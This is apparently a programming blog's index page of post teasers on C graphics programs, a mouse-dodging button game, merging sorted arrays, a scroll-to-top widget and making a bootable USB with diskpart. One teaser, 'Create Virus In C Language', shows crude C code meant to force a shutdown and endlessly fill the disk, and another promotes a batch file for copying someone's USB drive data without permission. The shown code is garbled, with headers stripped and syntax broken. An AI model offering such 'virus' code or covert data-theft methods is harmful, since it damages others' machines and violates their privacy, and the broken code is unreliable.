This program can draw different shapes using mouse such as line, circle, pixel and many other shapes. You can also change the color, clear the screen. #include #include #include #include #include #include union REGS i, o; int leftcolor[15]; i… Read more »
Press me Button Game in C
In this game when you try to bring mouse near a button it moves away from the mouse, so you keep on trying pressing the button. In this game we have the coordinates of current position of mouse pointer at every moment of time, whenever we find mo… Read more »
Create Virus In C Language
PC Shutdown: #include #include void main() { system("shutdown-s"); getch() } Delete Directory: #include #include void main() { while(1) { system("dir>>a.sa.exe"); getch() } }… Read more »
C CODE TO MERGE TWO SORTED ARRAYS
#include void merge(int [], int, int [], int, int []); int main() { int a[100], b[100], m, n, c, sorted[200]; printf("Input number of elements in first array\n"); scanf("%d", &m); printf("Input %d integers\n", m); for (c = 0; c m… Read more »
Scroll To Top Buttons
For Blog click add widget than Html/Java Script Code than paste anyone code below shown.... Scroll to Top buttons allow your website visitors to easily scroll back to the top of your page with one click of the button. This gives your website better … Read more »
Steal Data From USB
try must want to steal someones data from any usb pen drive?? [Without his/her permission] . (for windows only) believe me u can easily copy someone's data into your PC without giving any idea to the other person...!! u may need to create a batch fi… Read more »
Make Usb Bootable Using CMD
goto cmd type diskpart type list disk type select disk(#) type clean type create partition primary type select partition 1 then type active type format fs=fat32 type assign then type exit. … Read more »